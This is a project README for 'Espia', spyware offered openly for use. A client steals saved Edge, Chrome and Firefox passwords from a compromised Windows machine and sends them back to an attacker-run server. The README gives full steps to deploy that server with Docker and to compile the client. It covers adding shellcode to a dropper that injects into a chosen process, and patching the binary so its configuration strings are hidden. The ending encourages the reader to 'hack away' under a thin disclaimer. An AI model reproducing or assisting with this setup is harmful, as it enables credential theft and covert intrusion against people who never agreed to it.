The Espia Project is a simple but useful client server SpyWare setup. Its main goal is to gather as much information as possible from the remote machine that has been compromised. Currently, the Espia client retrieves Edge, Chrome and Firefox passwords that are stored on the PC and enables a stealthy and fast way to conduct a brief and small attak.
Espia client is written in c++ and is available in the Espia_Client fork. The client works in 2 stages:
- Launcher - which launches and downloads the espia.exe file from the server.
- Espia - The actual client that executes and collects all plugins available. At the end of the execution , the server will have all product results in the current session_id directory that will be explained in the next section.
- All retrieved products from Espia Client will be rendered and created on a local directory by their own session_id that is randomly generated.
-
final_results.json will include all retrieved data from the remote target
-
You can set up a MailGun account in order to get an email sent to your specified address, when results have been retrieved.
Clone the main project and all submodules
git clone --recurse-submodules https://github.com/tomp332/TheEspiaProject.git
Create your configuration template file using the following format:
[app]
SERVER_IP = 0.0.0.0
SERVER_PORT = 443
ESPIA_ENV = <prod/local>
[mailgun]
API_KEY = <Mailgun api key>
MAILGUN_DOMAIN = <Mailgun email domain>
MAILGUN_USER = <Mailgun username>
DESTINATION_EMAIL = <Destination email for results to be sent to>
note prod mode will disable all the debug routes such as /docs for a Swagger application
note 0.0.0.0 is meant to run inside docker environment, so don't change it
- Clone and install:
https://github.com/tomp332/Espia_Server.git
cd Espia_Server
pip install -r requirements.txt
- Certificates are located at espia_server/certs, override them with your own if you'd like, otherwise localhost certs will run
Using the docker-compose.yml file you can quickly configure your own custom server
version: "3.8"
services:
espia_server:
container_name: espia_server
restart: always
image: ghcr.io/tomp332/espia-server:latest
ports:
- 443:443
volumes:
# Your main configuration file
- type: bind
source: <your main config.ini file>
target: /server/espia_server/configs/config.ini
# Storage for all session files that Espia receives
- type: bind
source: <path to all local session files storage>
target: /server/espia_server/app/uploads
# By default there are localhost public\private keys installed,
# if you want production ones override them, otherwise remove these 2 binds
- type: bind
source: <path to public key>
target: /server/espia_server/certs/public_key.pem
- type: bind
source: <path to private key>
target: /server/espia_server/certs/private_key.pem
Using the Espia_Client forked project, follow the following configuration in order to compile your own version of the executer.
note: This was written in Visual Studio 2022 with the latest c++ version
- Espia.cpp Edit the raw configuration in order for the exe file to be compiled with your desired configurations. This is mainly for debug purposes, since there is a script which encodes this in order for it not be in plain text for the final binary.
<line 21> static const unsigned char CONFIG_BUFFER[1000] = "{\"Domain\":\"<Your server's domain\IP>\",\"Port\":\"<Your server port>\",\"ProductsPath\":\"<Desired products path on target machine>\"}";
- Launcher.cpp
note: This is optional, launching Espia.exe only is perfectly fine
For the second solution that is attached to the Espia project, there is a Downloader executor if you would like your malware to be downloaded using a shellcode dropper. In order to create your own, edit Launcher.cpp with your own shellcode:
<line43> unsigned char buffer[] = "<Your shellcode here>";
<line44> std::string sTargetProcess = STR("<Process name you would like to inject to>");
- All is left at this point is to compile and hack away!
- For Debug mode , the plaint text configuration will not be encoded in order to properly debug the code for your convenience
- In Release mode, you can remove the configuration text and leave only the values empty in order to encode and inject the new configuration through a python script that is available in the Espia Server. For example:
static const unsigned char CONFIG_BUFFER[1000] = "{\"Domain\":\"\",\"Port\":\"\",\"ProductsPath\":\"\"}";
- The configuration patcher is available in the Espia_Server project, espia_server/app/scripts/espia_patcher.py
This script basically overrides and encodes your specified json configuration for your Espia Client. It searches for the beginning of the original configuration offset and overrides it with the exact buffer size as the source code. This is mainly in order to hide the plain text configurations strings.
- In the Espia_Server project you will find the patch script at: espia_server\app\scripts\espia_patch.py
- Edit both variables with your own configurations: _COMPILED_MALWARE_PATH and _CONFIG
- Run the script and patched copy of the Espia Client will be created at the static_files directory where you can serve it through the server or with whatever way you want.
- Output example:
[+] Finished patching file: static_files / Espia.exe, offset: 1104032
After the configuration of the docker-compose.yml:
docker-compose up
- Override the espia_server/configs/config.ini file with the one you created at the last step, and you're all set
python3 -m espia_server
- @dvbergmann David Bergmann
Feel free to open issues and contact us with any question 👍
You shall not misuse the information to gain unauthorised access. However, you may try out these hacks on your own computer at your own risk. Performing hack attempts (without permission) on computers that you do not own is illegal.
Enjoy 🤘